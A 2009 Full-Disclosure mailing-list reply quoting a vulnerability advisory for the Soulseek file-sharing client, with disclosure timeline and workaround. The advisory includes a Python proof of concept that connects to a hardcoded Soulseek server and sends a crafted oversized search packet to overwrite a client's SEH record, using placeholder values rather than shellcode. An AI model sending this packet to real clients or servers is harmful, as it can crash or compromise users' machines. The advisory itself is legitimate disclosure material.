Seems like you have a problem with responsible disclosure Kid ; Do you have any familly relationship with jeremy Brown ? ;P
http://g-laurent.blogspot.com/2009/05/soulseek-p2p-remote-distributed-search.html#comments 2009/5/25 Pete Licoln <[email protected]> > Oh so you have a blog ... > http://g-laurent.blogspot.com/ > > 2009/5/25 laurent gaffie <[email protected]> > >> ============================================= >> - Release date: May 24th, 2009 >> - Discovered by: Laurent GaffiƩ >> - Severity: critical >> ============================================= >> >> I. VULNERABILITY >> ------------------------- >> Soulseek 157 NS * & 156.* Remote Distributed Search Code Execution >> >> II. BACKGROUND >> ------------------------- >> "Soulseek(tm) is a unique ad-free, spyware free, and just plain free file >> sharing application. >> One of the things that makes Soulseek(tm) unique is our community and >> community-related features. >> Based on peer-to-peer technology, virtual rooms allow you to meet people >> with >> the same interests, share information, and chat freely using real-time >> messages >> in public or private. >> Soulseek(tm), with its built-in people matching system, is a great way to >> make >> new friends and expand your mind!" >> >> III. DESCRIPTION >> ------------------------- >> Soulseek client allows distributed file search to one person, everyone, or >> in a >> specific Soulseek IRC channel, allowing a user to find the files he wants, >> in >> a dedicated channel, or with his contacts, or on the whole network. >> Unfortunatly this feature is vulnerable to a remote SEH overwrite to a >> specific >> user, or even to a whole Soulseek IRC channel. >> >> IV. PROOF OF CONCEPT >> ------------------------- >> This proof of concept is made to prevent a S-K party, it is only build to >> target the user "testt4321". >> >> To try this proof of concept, you would have to open a soulseek client and >> use >> the username: >> "testt4321" >> with the password: >> "12345678" >> And launch this code. >> If you want to change the username or target a whole channel, you would >> have >> to reverse the binary protocol >> >> >> >> #!/usr/bin/python >> import struct >> import sys, socket >> from time import * >> >> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) >> s.connect(("208.76.170.50",2242)) # Change to Port 2240 for 156* branch >> >> buffer = >> "\x48\x00\x00\x00\x01\x00\x00\x00\x08\x00\x00\x00\x74\x65\x73\x74" >> buffer+= >> "\x34\x33\x32\x31\x08\x00\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38" >> buffer+= >> "\xb5\x00\x00\x00\x20\x00\x00\x00\x38\x65\x39\x31\x66\x37\x33\x30" >> buffer+= >> "\x35\x35\x37\x31\x32\x35\x64\x37\x34\x39\x32\x34\x62\x64\x66\x35" >> buffer+= "\x63\x32\x39\x61\x36\x37\x64\x61\x01\x00\x00\x00" >> >> s.send(buffer) >> sleep(1) >> >> junk = "\x41" * 3084 >> next_seh = struct.pack('<L', 0x42424242) >> seh = struct.pack('<L', 0x43434343) >> other_junk = "\x61" * 1423 >> >> buffer2 = >> "\x01\x0f\x00\x00\x2a\x00\x00\x00\x09\x00\x00\x00\x74\x65\x73\x74" >> buffer2+= >> "\x74\x34\x33\x32\x31\xa4\x5a\x51\x44\xe8\x0e\x00\x00"+junk+next_seh+seh+other_junk >> s.send(buffer2) >> sleep(1) >> s.recv(1024) >> >> >> >> After the query is send, the memory will look like this >> 0012FBE4 41414141 >> 0012FBE8 42424242 Pointer to next SEH record >> 0012FBEC 43434343 SE handler >> 0012FBF0 61616161 >> >> And the program will terminate with this structure: >> EAX 00000000 >> ECX 43434343 >> EDX 7C9132BC ntdll.7C9132BC >> EBX 00000000 >> ESP 0012EA78 >> EBP 0012EA98 >> ESI 00000000 >> EDI 00000000 >> EIP 43434343 >> >> >> V. BUSINESS IMPACT >> ------------------------- >> An attacker could exploit this vulnerability to compromise any Soulseek >> client connected to >> the Soulseek network. >> >> VI. SYSTEMS AFFECTED >> ------------------------- >> Windows all versions running Soulseek * >> >> VII. SOLUTION >> ------------------------- >> A fast solution would be to use Nicotine-Plus ( >> http://nicotine-plus.sourceforge.net/) >> a Python Soulseek client. >> Another quick workaround (at server level) would be to limit the search >> query lenght. >> >> VIII. REFERENCES >> ------------------------- >> http://www.slsknet.org >> >> IX. CREDITS >> ------------------------- >> This vulnerability has been discovered by Laurent GaffiƩ >> Laurent.gaffie{remove-this}(at)gmail.com >> >> >> X. REVISION HISTORY >> ------------------------- >> May 24, 2009: Initial release >> >> >> XI. DISCLOSURE TIMELINE >> ------------------------- >> july 29, 2008: Bug discovered >> September 03, 2008: Vendor contacted; no response. >> October 14, 2008: Vendor contacted; still no response. >> April 12, 2009: Idefense contacted. >> April 13, 2009: Idefense answered. >> April 23, 2009: Advisory send to idefense contributor program. >> May 13, 2009: Idefense contacted, bug rejected (no reason given) >> May 15, 2009: Idefense recontacted; no answer. >> May 16, 2009: Last try to contact Soulseek maintainers >> May 24, 2009: Advisory published. >> >> XII. LEGAL NOTICES >> ------------------------- >> The information contained within this advisory is supplied "as-is" >> with no warranties or guarantees of fitness of use or otherwise. >> I accept no responsibility for any damage caused by the use or >> misuse of this information. >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
